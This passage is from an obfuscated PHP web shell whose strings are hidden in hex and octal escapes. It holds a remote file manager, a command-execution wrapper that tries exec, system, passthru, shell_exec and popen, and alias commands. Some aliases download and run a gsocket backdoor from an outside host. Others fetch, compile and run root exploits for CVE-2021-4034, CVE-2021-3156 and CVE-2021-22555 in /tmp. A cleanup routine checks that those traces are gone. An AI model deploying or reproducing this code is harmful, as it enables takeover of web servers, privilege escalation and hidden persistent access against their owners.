\x6e\x6b\x69\x74\40\x67\x63\x6f\x6e\166\55\155\x6f\144\165\x6c\145\163\40\160\x61\x79\x6c\x6f\141\144\x2e\163\x6f")."\74\x2f\160\x72\x65\76\x3c\142\x72\76".PHP_EOL;$tmp=sys_get_temp_dir();if(!file_exists($tmp."\57\x61\x73\56\160\x79")){$result_clearrooting.="\102\x65\162\150\141\x73\151\154\x21";}if(!file_exists($tmp."\57\x61\163\x77\56\160\171")&&!file_exists($tmp."\x2f\x70\141\x79\x6c\x6f\x61\x64\x2e\163\157")){$result_clearrooting.="\102\145\162\x68\141\x73\151\154\41";}if(!file_exists($tmp."\57\x65\170\160\x6c\157\x69\164\x2e\x63")&&!file_exists($tmp."\57\x65\x78\160\154\x6f\x69\x74")){$result_clearrooting.="\102\145\162\x68\141\163\151\154\x21";}if(!file_exists($tmp."\57\115\x61\x6b\145\146\151\x6c\x65")&&!file_exists($tmp."\x2f\143\166\x65\55\62\60\62\x31\55\x34\x30\63\x34\56\143")&&!file_exists($tmp."\57\143\x76\x65\x2d\62\x30\62\x31\x2d\64\60\x33\64\56\x73\x68")&&!file_exists($tmp."\57\x70\x77\x6e\153\x69\164\56\143")&&!file_exists($tmp."\x2f\143\x76\145\x2d\x32\x30\x32\61\x2d\64\x30\63\64")&&!file_exists($tmp."\x2f\160\167\x6e\x6b\x69\x74\56\163\157")&&!file_exists($tmp."\57\x70\167\x6e\x6b\151\x74")&&!is_dir($tmp."\x2f\x67\x63\x6f\x6e\166\55\155\157\144\x75\x6c\145\163")&&!is_dir($tmp."\57\107\x43\x4f\x4e\126\137\x50\101\x54\x48\x3d\x2e")){$result_clearrooting.="\x42\x65\x72\x68\x61\163\151\x6c\x21";}echo "\x3c\x64\x69\166\x20\x63\x6c\x61\x73\x73\75\42\x73\x6d\141\x6c\154\x61\162\145\141\x22\x20\x6e\141\x6d\145\75\x22\x6f\x75\x74\160\165\x74\x20\163\164\x79\x6c\145\75\42\x62\x6f\x72\x64\x65\162\55\142\157\164\x74\x6f\x6d\72\60\73\155\141\x72\147\151\x6e\55\x74\157\x70\72\x35\160\170\x3b\x22\x20\x72\145\x61\144\x6f\x6e\154\171\x3e";print_r($result_clearrooting).PHP_EOL;echo "\x3c\x2f\144\151\166\x3e";}echo "\x3c\57\144\151\166\76";echo "\74\57\x64\151\166\x3e";die;}goto gXAzU;jJ2Wl:$keyxx=$_SESSION["\153\x65\x79\x78\x78"];goto VVA1v;qq4r6:if(version_compare(PHP_VERSION,"\x35\x2e\x33\56\x30","\x3c")){set_magic_quotes_runtime(0);}goto ZktEK;ZiHyv:$disable_functions=@ini_get("\x64\151\x73\x61\142\x6c\145\137\x66\165\156\143\164\151\x6f\x6e\163");goto xW3PA;KQnLx:function actionFilesMan(){if(!empty($_COOKIE["\x66"])){$_COOKIE["\146"]=@unserialize($_COOKIE["\146"]);}if(!empty($_POST["\x70\x31"])){switch($_POST["\160\x31"]){case "\165\160\154\157\x61\144\x46\x69\154\145":if(is_array($_FILES["\146"]["\164\155\160\137\156\x61\155\145"])){foreach($_FILES["\x66"]["\x74\155\160\x5f\156\x61\155\x65"]as $i=>$tmpName){if(!@move_uploaded_file($tmpName,$_FILES["\146"]["\x6e\141\x6d\x65"][$i])){echo "\x43\x61\156\47\164\40\x75\x70\x6c\x6f\141\x64\40\x66\x69\x6c\145\41";}}}break;case "\x6d\x6b\144\151\162":if(!@mkdir($_POST["\160\62"])){echo "\x43\x61\156\47\x74\40\x63\162\x65\141\x74\145\x20\x6e\145\x77\40\144\x69\162";}break;case "\x64\x65\154\x65\164\x65":function deleteDir($path){$path=substr($path,-1)=="\x2f"?$path:$path."\x2f";$dh=opendir($path);while(($asciifnc6=readdir($dh))!==false){$asciifnc6=$path.$asciifnc6;if(basename($asciifnc6)=="\x2e\x2e"||basename($asciifnc6)=="\56"){continue;}$type=filetype($asciifnc6);if($type=="\x64\151\162"){deleteDir($asciifnc6);}else{@unlink($asciifnc6);}}closedir($dh);@rmdir($path);}if(is_array(@$_POST["\146"])){foreach($_POST["\x66"]as $f){if($f=="\x2e\56"){continue;}$f=urldecode($f);if(is_dir($f)){deleteDir($f);}else{@unlink($f);}}}break;case "\160\141\163\164\145":if($_COOKIE["\x61\x63\164"]=="\143\157\160\x79"){function copy_paste($c,$s,$d){if(is_dir($c.$s)){mkdir($d.$s);$h=@opendir($c.$s);while(($f=@readdir($h))!==false){if($f!="\x2e"and $f!="\x2e\56"){copy_paste($c.$s."\x2f",$f,$d.$s."\x2f");}}}elseif(is_file($c.$s)){@copy($c.$s,$d.$s);}}foreach($_COOKIE["\146"]as $f){copy_paste($_COOKIE["\x63"],$f,$GLOBALS["\x63\167\144"]);}}elseif($_COOKIE["\x61\x63\164"]=="\155\x6f\x76\x65"){function move_paste($c,$s,$d){if(is_dir($c.$s)){mkdir($d.$s);$h=@opendir($c.$s);while(($f=@readdir($h))!==false){if($f!="\56"and $f!="\56\56"){copy_paste($c.$s."\57",$f,$d.$s."\57");}}}elseif(@is_file($c.$s)){@copy($c.$s,$d.$s);}}foreach($_COOKIE["\146"]as $f){@rename($_COOKIE["\x63"].$f,$GLOBALS["\143\167\x64"].$f);}}elseif($_COOKIE["\x61\x63\164"]=="\172\151\x70"){if(class_exists("\x5a\x69\160\x41\x72\x63\150\151\166\x65")){$zip=new ZipArchive();if($zip->open($_POST["\x70\x32"],1)){chdir($_COOKIE["\143"]);foreach($_COOKIE["\146"]as $f){if($f=="\56\56"){continue;}if(@is_file($_COOKIE["\143"].$f)){$zip->addFile($_COOKIE["\143"].$f,$f);}elseif(@is_dir($_COOKIE["\143"].$f)){$iterator=new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f."\57",FilesystemIterator::SKIP_DOTS));foreach($iterator as $key=>$value){$zip->addFile(realpath($key),$key);}}}chdir($GLOBALS["\x63\167\144"]);$zip->close();}}}elseif($_COOKIE["\141\x63\x74"]=="\x75\156\x7a\151\x70"){if(class_exists("\132\151\x70\x41\162\x63\150\x69\x76\145")){$zip=new ZipArchive();foreach($_COOKIE["\x66"]as $f){if($zip->open($_COOKIE["\143"].$f)){$zip->extractTo($GLOBALS["\x63\x77\x64"]);$zip->close();}}}}elseif($_COOKIE["\x61\143\164"]=="\x74\x61\162"){chdir($_COOKIE["\143"]);$_COOKIE["\146"]=array_map("\145\x73\x63\141\160\145\163\x68\x65\x6c\154\x61\x72\x67",$_COOKIE["\146"]);ex("\x74\x61\162\40\143\x66\x7a\x76\x20".escapeshellarg($_POST["\160\x32"])."\40".implode("\x20",$_COOKIE["\146"]));chdir($GLOBALS["\x63\x77\144"]);}unset($_COOKIE["\x66"]);setcookie("\x66",'',time()-3600);break;default:if(!empty($_POST["\x70\61"])){prototype("\141\x63\164",$_POST["\160\61"]);prototype("\146",serialize(@$_POST["\146"]));prototype("\143",@$_POST["\143"]);}break;}}hardHeader();echo "\x3c\150\61\x3e\x46\151\154\145\40\x6d\x61\156\x61\x67\145\162\x3c\57\150\x31\76\74\144\151\x76\x20\143\x6c\x61\x73\163\x3d\143\157\x6e\164\145\x6e\x74\76\x3c\x73\x63\x72\x69\160\x74\76\x70\x31\137\75\160\62\137\x3d\x70\x33\137\x3d\42\x22\x3b\74\x2f\x73\143\x72\151\x70\164\76";$dirContent=hardScandir(isset($_POST["\x63"])?$_POST["\x63"]:$GLOBALS["\143\x77\144"]);if($dirContent===false){echo "\103\141\x6e\x27\x74\x20\157\x70\x65\x6e\x20\164\x68\151\163\40\x66\157\154\x64\145\162\41";hardFooter();return;}global $sort;$sort=array("\156\x61\155\x65",1);if(!empty($_POST["\160\61"])){if(preg_match("\41\163\137\x28\x5b\x41\55\x7a\135\x2b\51\x5f\50\134\144\173\61\x7d\51\x21",$_POST["\x70\61"],$match)){$sort=array($match[1],(int) $match[2]);}}echo "\x3c\x73\x63\x72\151\x70\x74\76\12\x66\x75\156\x63\x74\151\157\156\40\x73\141\x28\x29\x20\173\12\146\x6f\x72\50\x69\x3d\x30\73\151\x3c\144\56\x66\x69\154\x65\x73\x2e\x65\x6c\x65\x6d\145\156\x74\x73\56\154\x65\156\x67\x74\x68\x3b\151\53\53\x29\xa\x69\x66\50\x64\x2e\x66\x69\x6c\x65\x73\x2e\x65\x6c\145\x6d\145\x6e\x74\163\133\151\135\56\164\x79\x70\x65\x20\75\75\x20\47\143\x68\x65\143\153\142\x6f\170\x27\51\xa\x64\x2e\x66\151\x6c\x65\x73\56\145\x6c\145\155\x65\x6e\164\x73\x5b\151\x5d\56\x63\x68\x65\143\x6b\x65\x64\x20\75\x20\144\56\146\151\154\145\163\56\x65\154\x65\155\x65\x6e\164\x73\133\60\135\x2e\143\150\145\x63\x6b\145\144\73\12\175\12\74\57\x73\x63\162\151\x70\x74\76\xa\x3c\164\141\x62\154\145\x20\167\151\x64\x74\150\x3d\47\x31\60\60\x25\x27\x20\143\x6c\x61\163\163\75\47\x6d\141\151\x6e\x27\40\143\x65\154\x6c\163\160\x61\143\x69\x6e\147\75\47\x30\47\x20\x63\x65\154\x6c\160\141\x64\144\x69\156\x67\x3d\x27\62\x27\x3e\12\x3c\x66\157\x72\x6d\x20\x6e\x61\155\145\x3d\146\151\154\x65\x73\40\155\x65\x74\x68\157\144\75\160\x6f\x73\x74\x3e\74\164\162\76\74\164\x68\x20\x77\151\x64\x74\x68\75\47\x31\x33\x70\x78\x27\76\x3c\151\156\x70\165\164\x20\x74\171\x70\x65\75\143\x68\x65\x63\153\x62\157\x78\x20\157\156\x63\x6c\x69\143\153\x3d\47\163\x61\50\x29\47\40\143\x6c\x61\163\x73\75\x63\150\x6b\x62\x78\76\x3c\x2f\164\x68\x3e\74\x74\x68\x3e\74\x61\40\x68\x72\x65\146\75\47\43\x27\x20\x6f\x6e\x63\x6c\151\143\153\75\x27\147\50\x22\x46\151\154\x65\163\x4d\141\x6e\42\x2c\x6e\x75\x6c\154\x2c\42\x73\x5f\156\141\155\145\x5f".($sort[1]?0:1)."\x22\x29\x27\x3e\x4e\141\x6d\x65\x3c\x2f\141\76\x3c\57\x74\150\x3e\74\x74\150\76\x3c\x61\40\150\162\x65\x66\75\x27\43\x27\40\x6f\x6e\x63\x6c\x69\143\x6b\x3d\47\147\50\42\x46\151\154\145\x73\115\x61\x6e\42\x2c\156\165\x6c\154\54\42\x73\137\x73\151\x7a\x65\137".($sort[1]?0:1)."\x22\x29\x27\76\123\x69\x7a\145\74\x2f\x61\x3e\x3c\57\x74\x68\76\74\x74\x68\76\74\141\x20\150\162\x65\146\75\47\x23\x27\x20\x6f\156\x63\154\x69\x63\153\75\47\x67\x28\42\106\x69\x6c\x65\x73\115\x61\x6e\42\x2c\156\165\154\154\x2c\42\x73\137\x6d\157\x64\x69\x66\x79\x5f".($sort[1]?0:1)."\42\51\x27\x3e\x4d\x6f\144\x69\x66\171\74\57\x61\x3e\x3c\57\x74\150\x3e\x3c\164\x68\76\117\x77\156\145\162\x2f\107\x72\157\165\x70\x3c\57\x74\x68\76\x3c\x74\x68\76\74\141\40\150\162\145\x66\75\47\x23\x27\x20\x6f\x6e\x63\154\x69\143\153\75\x27\147\x28\x22\106\x69\x6c\145\163\x4d\x61\156\42\x2c\x6e\165\154\x6c\x2c\x22\x73\x5f\x70\145\162\155\163\x5f".($sort[1]?0:1)."\x22\x29\47\x3e\x50\x65\162\155\151\x73\163\x69\x6f\x6e\x73\74\57\141\76\74\57\x74\150\76\74\x74\x68\76\101\x63\164\151\x6f\x6e\x73\74\x2f\x74\x68\x3e\74\57\x74\162\76";$dirs=$files=array();$n=count($dirContent);for($i=0;$i<$n;$i++){$ow=@posix_getpwuid(@fileowner($dirContent[$i]));$gr=@posix_getgrgid(@filegroup($dirContent[$i]));$tmp=array("\156\141\x6d\x65"=>$dirContent[$i],"\x70\x61\x74\x68"=>$GLOBALS["\x63\x77\144"].$dirContent[$i],"\x6d\x6f\144\151\146\171"=>date("\131\x2d\155\55\x64\x20\x48\x3a\x69\x3a\x73",@filemtime($GLOBALS["\143\x77\144"].$dirContent[$i])),"\x70\145\x72\x6d\x73"=>viewPermsColor($GLOBALS["\x63\x77\x64"].$dirContent[$i]),"\163\x69\172\145"=>@filesize($GLOBALS["\143\167\x64"].$dirContent[$i]),"\x6f\167\156\145\162"=>$ow["\156\x61\155\145"]?$ow["\156\x61\x6d\145"]:@fileowner($dirContent[$i]),"\x67\x72\x6f\x75\x70"=>$gr["\x6e\141\x6d\x65"]?$gr["\x6e\x61\155\145"]:@filegroup($dirContent[$i]));if(@is_file($GLOBALS["\143\x77\144"].$dirContent[$i])){$files[]=array_merge($tmp,array("\164\x79\160\x65"=>"\x66\x69\x6c\145"));}elseif(@is_link($GLOBALS["\143\167\x64"].$dirContent[$i])){$dirs[]=array_merge($tmp,array("\164\171\160\145"=>"\154\x69\156\153","\x6c\x69\x6e\153"=>readlink($tmp["\160\x61\164\150"])));}elseif(@is_dir($GLOBALS["\x63\x77\x64"].$dirContent[$i])&&$dirContent[$i]!="\56"){$dirs[]=array_merge($tmp,array("\x74\171\x70\x65"=>"\x64\151\x72"));}}$GLOBALS["\x73\x6f\x72\x74"]=$sort;function cmp($a,$b){if($GLOBALS["\163\x6f\x72\x74"][0]!="\163\151\x7a\145"){return strcmp(strtolower($a[$GLOBALS["\x73\157\x72\164"][0]]),strtolower($b[$GLOBALS["\x73\157\x72\164"][0]]))*($GLOBALS["\163\x6f\x72\164"][1]?1:-1);}else{return($a["\x73\151\172\x65"]<$b["\x73\x69\172\x65"]?-1:1)*($GLOBALS["\x73\x6f\162\x74"][1]?1:-1);}}usort($files,"\x63\155\x70");usort($dirs,"\143\x6d\x70");$files=array_merge($dirs,$files);$l=0;foreach($files as $f){echo "\x3c\x74\162".($l?"\40\143\x6c\141\163\x73\x3d\x6c\61":'')."\x3e\x3c\164\144\76\74\151\156\x70\x75\164\x20\164\x79\x70\x65\x3d\143\150\x65\143\153\142\157\170\x20\x6e\x61\155\x65\75\x22\x66\x5b\x5d\42\x20\x76\x61\x6c\x75\x65\75\42".urlencode($f["\x6e\141\x6d\145"])."\42\40\143\x6c\141\163\163\x3d\x63\x68\x6b\x62\170\76\x3c\57\x74\x64\x3e\x3c\x74\x64\76\74\141\x20\150\x72\145\146\75\43\x20\x6f\x6e\143\154\x69\x63\x6b\75\42".($f["\x74\x79\x70\145"]=="\146\x69\x6c\145"?"\147\x28\47\x46\151\154\145\x73\x54\157\x6f\x6c\163\x27\x2c\x6e\165\154\x6c\x2c\47".urlencode($f["\156\141\155\145"])."\x27\54\x20\x27\x76\x69\x65\167\x27\51\x22\76".htmlspecialchars($f["\x6e\x61\155\x65"]):"\x67\50\47\x46\x69\x6c\145\163\115\141\x6e\47\54\x27".$f["\160\x61\164\150"]."\47\51\73\42\x20".(empty($f["\154\x69\x6e\x6b"])?'':"\164\x69\x74\x6c\x65\x3d\x27{$f["\154\x69\x6e\x6b"]}\47")."\x3e\x3c\x62\x3e\x5b\40".htmlspecialchars($f["\156\x61\x6d\x65"])."\40\135\x3c\57\x62\x3e")."\x3c\57\141\76\74\57\x74\x64\x3e\74\x74\x64\x3e".($f["\x74\x79\160\x65"]=="\146\151\x6c\x65"?viewSize($f["\163\x69\x7a\145"]):$f["\164\171\x70\145"])."\x3c\57\x74\x64\x3e\74\x74\x64\x3e".$f["\155\x6f\x64\151\146\x79"]."\74\x2f\164\144\76\x3c\x74\144\x3e".$f["\157\x77\x6e\145\162"]."\57".$f["\147\162\x6f\x75\x70"]."\x3c\57\164\x64\76\x3c\x74\x64\x3e\74\x61\40\x68\162\x65\146\x3d\43\x20\157\x6e\x63\x6c\x69\x63\x6b\x3d\42\147\x28\47\106\151\154\145\x73\124\157\x6f\154\x73\x27\54\x6e\165\x6c\x6c\54\47".urlencode($f["\156\141\155\x65"])."\x27\x2c\x27\x63\x68\155\157\144\x27\x29\x22\76".$f["\x70\145\162\x6d\x73"]."\x3c\x2f\x74\144\x3e\x3c\x74\x64\76\x3c\x61\x20\143\x6c\141\163\163\75\x22\164\x6f\x6f\154\164\x69\x70\42\x20\x64\141\164\x61\55\164\157\x6f\x6c\x74\151\x70\x3d\42\122\145\156\141\155\145\42\40\x68\x72\145\146\x3d\x22\43\x22\x20\x6f\x6e\x63\154\x69\143\x6b\75\42\147\x28\47\106\x69\x6c\145\x73\124\157\x6f\154\x73\47\54\156\165\x6c\154\x2c\x27".urlencode($f["\156\x61\155\145"])."\47\x2c\40\47\162\145\x6e\141\155\145\x27\51\42\76\x52\74\x2f\x61\x3e\x20\74\141\40\x63\x6c\x61\163\x73\x3d\42\x74\x6f\157\154\164\151\x70\x22\40\144\141\x74\x61\55\164\x6f\157\154\x74\151\x70\75\42\124\x6f\165\143\x68\x22\40\x68\x72\145\146\x3d\x22\43\x22\x20\x6f\x6e\143\154\x69\x63\153\x3d\x22\x67\50\47\106\x69\154\x65\x73\124\157\157\x6c\163\47\x2c\156\x75\x6c\154\54\x27".urlencode($f["\x6e\141\x6d\145"])."\x27\x2c\x20\x27\164\157\165\143\150\x27\x29\x22\x3e\x54\x3c\57\x61\x3e".($f["\164\171\x70\145"]=="\146\x69\x6c\x65"?"\x20\74\141\40\143\154\x61\x73\x73\x3d\x22\x74\157\157\154\164\x69\x70\42\40\144\141\x74\x61\55\164\157\157\x6c\x74\x69\160\75\42\106\162\x61\155\145\42\40\x68\x72\x65\146\x3d\x22\43\x22\40\157\156\143\154\151\143\x6b\x3d\x22\x67\x28\47\x46\x69\x6c\145\163\124\x6f\157\154\x73\x27\54\x6e\165\x6c\x6c\x2c\x27".urlencode($f["\x6e\141\155\x65"])."\x27\54\40\47\x66\x72\141\x6d\x65\47\51\42\76\x46\74\x2f\141\x3e\40\x3c\x61\x20\x63\x6c\141\x73\x73\x3d\x22\164\157\x6f\x6c\164\151\160\x22\x20\144\141\x74\x61\55\164\x6f\x6f\154\x74\x69\x70\75\42\105\144\x69\164\x22\40\x68\x72\145\146\75\x22\x23\x22\40\x6f\x6e\143\x6c\x69\143\153\x3d\x22\147\x28\x27\x46\151\x6c\145\163\x54\157\x6f\154\x73\x27\54\x6e\165\x6c\154\54\47".urlencode($f["\x6e\141\155\x65"])."\x27\x2c\x20\47\x65\x64\x69\x74\x27\x29\42\x3e\x45\74\57\x61\76\x20\x3c\x61\40\143\154\141\x73\163\x3d\42\164\157\157\154\164\x69\x70\42\x20\144\x61\164\141\55\164\157\x6f\x6c\x74\x69\160\x3d\42\104\x6f\x77\x6e\x6c\157\x61\144\42\40\150\162\145\146\75\x22\x23\x22\40\157\156\x63\154\x69\x63\x6b\75\x22\x67\x28\47\x46\x69\x6c\x65\x73\x54\157\157\x6c\x73\47\54\x6e\x75\x6c\154\54\47".urlencode($f["\x6e\x61\x6d\x65"])."\x27\54\x20\x27\x64\157\167\x6e\154\157\x61\x64\x27\x29\x22\x3e\x44\74\x2f\141\76":'')."\74\x2f\164\x64\x3e\74\57\164\162\x3e";$l=$l?0:1;}echo "\74\164\162\x20\x69\x64\x3d\x66\x61\x6b\76\74\x74\144\40\143\x6f\x6c\163\160\141\156\x3d\x37\76\xa\74\x69\x6e\160\165\164\40\164\x79\x70\145\x3d\150\x69\x64\144\145\156\40\156\141\155\145\x3d\x6e\x65\40\x76\141\154\x75\x65\x3d\47\47\x3e\xa\74\151\156\160\165\164\40\x74\171\x70\145\75\150\x69\144\x64\x65\156\x20\x6e\x61\155\x65\75\x61\40\166\x61\x6c\165\145\x3d\47\x46\x69\x6c\145\163\115\141\x6e\47\x3e\12\x3c\x69\x6e\x70\x75\164\40\x74\x79\x70\x65\x3d\150\x69\x64\x64\145\x6e\x20\156\141\155\x65\75\x63\40\x76\141\154\x75\x65\75\47".htmlspecialchars($GLOBALS["\143\167\144"])."\x27\x3e\12\74\151\156\160\165\x74\x20\x74\171\160\x65\75\x68\x69\x64\144\x65\x6e\40\x6e\141\155\x65\x3d\x63\x68\x61\x72\x73\145\x74\x20\x76\x61\154\165\x65\x3d\x27".(isset($_POST["\143\150\141\162\163\x65\x74"])?$_POST["\143\150\141\x72\163\145\164"]:'')."\x27\x3e\xa\x3c\154\141\x62\x65\154\76\x3c\163\x65\x6c\x65\143\164\40\156\141\x6d\145\75\47\x70\61\x27\76";if(!empty($_COOKIE["\141\x63\x74"])&&@count($_COOKIE["\146"])){echo "\74\157\x70\x74\151\x6f\x6e\x20\x76\141\x6c\165\145\75\x27\160\141\163\x74\x65\47\x3e\342\x86\263\40\x50\141\163\x74\x65\x3c\x2f\x6f\160\164\x69\x6f\x6e\x3e";}echo "\74\157\160\x74\151\x6f\156\x20\166\141\154\x75\145\x3d\47\143\x6f\160\x79\x27\x3e\x43\157\160\171\74\x2f\x6f\x70\x74\x69\x6f\x6e\x3e\74\x6f\x70\164\151\x6f\156\40\x76\x61\154\x75\145\75\x27\x6d\x6f\x76\145\x27\76\x4d\157\166\145\x3c\x2f\157\160\164\151\157\x6e\76\74\157\x70\164\151\x6f\156\x20\166\x61\x6c\x75\x65\x3d\x27\x64\x65\x6c\x65\x74\145\47\x3e\x44\x65\154\145\x74\x65\x3c\57\x6f\160\x74\151\x6f\x6e\x3e";if(class_exists("\132\x69\x70\101\162\143\150\151\x76\x65")){echo "\74\157\160\x74\151\x6f\156\x20\166\x61\154\165\x65\x3d\47\x7a\151\x70\x27\76\53\40\172\151\160\74\x2f\157\160\x74\x69\x6f\156\x3e\x3c\157\160\x74\151\x6f\156\40\166\141\x6c\x75\145\75\x27\165\156\x7a\151\x70\47\76\x2d\40\172\x69\x70\74\57\x6f\160\164\151\157\156\x3e";}echo "\74\157\160\x74\x69\157\156\40\166\x61\x6c\165\x65\x3d\47\164\x61\x72\47\x3e\53\40\x74\x61\162\56\147\x7a\x3c\x2f\157\160\x74\x69\157\156\x3e";echo "\x3c\57\x73\145\x6c\x65\x63\x74\x3e\x3c\x2f\x6c\x61\x62\x65\154\76";if(!empty($_COOKIE["\141\143\164"])&&@count($_COOKIE["\146"])&&($_COOKIE["\x61\x63\x74"]=="\172\151\x70"||$_COOKIE["\141\143\164"]=="\x74\141\162")){echo "\x26\156\x62\x73\x70\x3b\x66\151\x6c\145\x20\x6e\x61\x6d\145\72\x20\x3c\x69\x6e\160\x75\164\x20\164\171\x70\145\75\x74\145\x78\164\40\x6e\141\x6d\145\x3d\x70\x32\40\166\141\154\x75\145\x3d\47\x68\x61\x72\144\137".date("\131\155\x64\137\110\151\x73")."\x2e".($_COOKIE["\x61\x63\164"]=="\x7a\x69\x70"?"\172\x69\160":"\164\141\x72\56\x67\172")."\x27\x3e\46\x6e\x62\x73\x70\x3b";}echo "\x3c\x69\156\x70\x75\x74\40\x74\x79\160\x65\75\47\163\x75\x62\155\151\164\47\40\x76\x61\154\165\x65\x3d\x27\163\165\142\155\151\164\x27\76\x3c\x2f\164\x64\76\74\x2f\164\x72\x3e\74\x2f\x66\x6f\162\x6d\x3e\x3c\57\x74\x61\x62\154\x65\76\74\57\144\151\166\76";hardFooter();}goto zPNwz;f_t7R:ini_set("\144\151\163\160\x6c\x61\171\137\145\x72\162\x6f\x72\163",0);goto biG74;W8DS5:function ex($in){$asciifnc7='';if(function_exists("\x65\x78\x65\143")){@exec($in,$asciifnc7);$asciifnc7=@join("\xa",$asciifnc7);}elseif(function_exists("\160\x61\x73\163\164\150\x72\165")){ob_start();@passthru($in);$asciifnc7=ob_get_clean();}elseif(function_exists("\163\171\163\164\x65\155")){ob_start();@system($in);$asciifnc7=ob_get_clean();}elseif(function_exists("\163\x68\x65\x6c\154\x5f\145\x78\x65\143")){$asciifnc7=shell_exec($in);}elseif(is_resource($f=@popen($in,"\x72"))){$asciifnc7='';while(!@feof($f)){$asciifnc7.=fread($f,1024);}pclose($f);}else{return "\342\x86\xb3\40\125\x6e\141\x62\154\145\x20\164\157\x20\x65\x78\x65\143\165\x74\145\40\x63\157\155\155\141\156\x64\xa";}return $asciifnc7==''?"\xe2\x86\263\x20\x47\x61\153\40\x42\x69\163\x61\x20\x45\x78\x65\x63\165\164\x65\x20\103\x6f\155\155\141\156\x64\41\xa":$asciifnc7;}goto rpdXp;xW3PA:$home_cwd=@getcwd();goto ei2I9;GoQMc:function which($p){$path=ex("\x77\x68\151\x63\150\40".$p);if(!empty($path)){return $path;}return false;}goto bLZtb;CsYiQ:$asciifnc2="\165\164\146\x2d\x38";goto nVw6c;Rw6YU:if($os=="\167\151\x6e"){$aliases=array("\x4c\151\163\164\x20\x44\x69\x72\x65\143\x74\x6f\x72\x79"=>"\x64\x69\x72","\106\x69\x6e\x64\40\151\156\x64\145\x78\56\x70\150\160\40\x69\x6e\40\143\x75\162\x72\x65\156\164\40\x64\151\x72"=>"\144\x69\162\x20\x2f\x73\x20\x2f\167\40\x2f\142\40\151\156\144\145\170\x2e\x70\x68\160","\x46\x69\x6e\x64\x20\x2a\x63\157\156\x66\x69\x67\52\56\160\x68\160\x20\x69\x6e\x20\x63\x75\x72\162\145\156\164\40\144\151\162"=>"\x64\x69\x72\40\57\163\40\57\x77\40\57\x62\x20\x2a\x63\157\156\146\x69\147\52\x2e\x70\x68\x70","\x53\150\x6f\x77\40\141\143\x74\x69\166\145\40\143\x6f\x6e\156\x65\x63\164\151\157\x6e\x73"=>"\x6e\x65\x74\x73\x74\141\164\40\x2d\x61\156","\x53\150\x6f\x77\x20\162\165\x6e\x6e\x69\x6e\x67\x20\x73\145\162\x76\x69\x63\x65\163"=>"\x6e\145\x74\x20\x73\x74\x61\x72\164","\x55\163\x65\x72\40\x61\x63\x63\157\165\156\x74\x73"=>"\156\145\164\40\165\x73\x65\x72","\123\150\157\167\40\143\x6f\x6d\x70\x75\x74\x65\162\163"=>"\156\145\x74\x20\x76\151\x65\x77","\101\122\x50\x20\124\x61\x62\x6c\145"=>"\x61\162\x70\x20\x2d\141","\x49\x50\40\103\157\156\146\151\x67\x75\162\141\x74\151\157\x6e"=>"\151\x70\x63\157\x6e\146\151\x67\x20\x2f\141\x6c\154");}else{$aliases=array("\x52\165\156\40\x47\x53"=>"\142\141\163\150\40\55\143\x20\134\x22\x24\50\167\x67\x65\x74\x20\55\x2d\156\157\x2d\x63\150\x65\x63\x6b\55\x63\x65\162\x74\151\x66\151\x63\141\x74\145\x20\55\161\117\x2d\40\147\163\157\143\x6b\x65\x74\56\151\x6f\57\x78\51\x22","\103\150\x65\x63\153\x20\x4d\157\x64\x75\154\145\x73"=>"\147\143\x63\40\55\166\x3b\x20\160\171\164\150\x6f\156\40\55\55\x76\x65\x72\163\x69\157\156\73\x20\x6d\141\153\x65\x20\55\55\166\145\x72\163\x69\157\x6e","\64\x30\x33\64\56\143"=>"\x63\144\40\x2f\x74\155\160\x20\x26\x26\x20\x65\166\141\154\40\x22\x24\50\143\x75\162\x6c\40\x2d\x73\x20\x68\164\x74\x70\x73\x3a\57\x2f\162\141\x77\56\147\x69\164\x68\x75\142\x75\163\145\x72\143\x6f\x6e\164\x65\x6e\x74\x2e\143\157\x6d\57\142\145\x72\144\x61\166\57\x43\126\105\55\62\60\62\x31\55\64\x30\x33\x34\x2f\x6d\x61\x69\x6e\x2f\x63\x76\145\x2d\x32\x30\62\61\55\64\60\63\64\x2e\163\x68\42","\x34\x30\x33\x34\56\x70\171"=>"\x63\x64\x20\57\164\x6d\160\x20\x26\46\40\x77\147\x65\164\40\55\x4f\40\141\163\x2e\160\171\x20\150\164\x74\x70\163\72\x2f\57\x72\141\167\x2e\x67\151\164\x68\x75\142\165\163\x65\x72\x63\157\156\x74\x65\156\x74\x2e\x63\157\x6d\x2f\x6a\157\145\141\x6d\x6d\157\156\144\x2f\x43\x56\105\55\62\60\62\x31\x2d\64\60\63\x34\x2f\x6d\x61\x69\x6e\x2f\103\126\105\x2d\x32\60\x32\x31\x2d\64\60\x33\x34\x2e\160\171\40\46\x26\40\x70\171\164\x68\x6f\156\x20\141\x73\x2e\160\x79","\x33\61\65\x36\56\x70\171"=>"\143\144\40\x2f\164\x6d\160\40\46\x26\40\x77\147\145\164\40\55\x4f\40\x61\x73\167\56\x70\171\40\150\x74\x74\x70\163\x3a\x2f\57\162\141\167\56\147\151\x74\x68\165\x62\165\163\145\x72\143\157\156\x74\x65\156\x74\x2e\143\157\155\57\x77\157\162\141\x77\151\x74\x2f\x43\126\105\x2d\62\60\62\61\x2d\63\x31\x35\66\57\x6d\x61\x69\156\x2f\x65\x78\x70\154\x6f\151\164\137\x75\x73\145\162\163\160\145\143\x2e\x70\171\40\x26\46\x20\160\x79\164\150\x6f\x6e\x20\141\x73\167\56\x70\171","\x65\x78\160\x6c\157\151\x74\x2e\143"=>"\x63\144\x20\57\164\155\x70\40\x26\x26\40\167\147\x65\164\x20\x2d\x4f\x20\145\x78\x70\154\157\151\164\56\143\40\150\x74\x74\x70\163\72\57\57\162\x61\167\56\147\151\164\150\x75\142\165\x73\145\162\x63\x6f\156\x74\x65\x6e\x74\x2e\143\157\155\x2f\x67\157\157\x67\x6c\145\57\163\x65\143\x75\162\151\x74\x79\x2d\162\x65\163\145\141\x72\x63\x68\57\x6d\141\x73\164\x65\162\57\x70\157\143\x73\x2f\154\x69\156\165\x78\57\x63\x76\x65\55\x32\x30\x32\x31\55\x32\x32\65\65\65\x2f\145\x78\x70\x6c\157\x69\x74\56\143\40\46\x26\40\147\143\x63\x20\x2d\155\x33\62\x20\55\163\x74\x61\x74\x69\x63\40\55\x6f\x20\145\x78\160\x6c\157\x69\164\x20\145\x78\160\154\x6f\x69\164\56\143\40\x26\46\x20\x63\150\155\157\144\40\x2b\170\40\x65\x78\160\154\x6f\151\x74\40\46\x26\40\x2e\x2f\145\170\x70\x6c\x6f\151\164","\x43\x6c\x65\x61\162\x20\112\x65\152\141\x6b\x20\x52\x6f\157\x74\151\x6e\147"=>"\x63\x64\40\57\x74\155\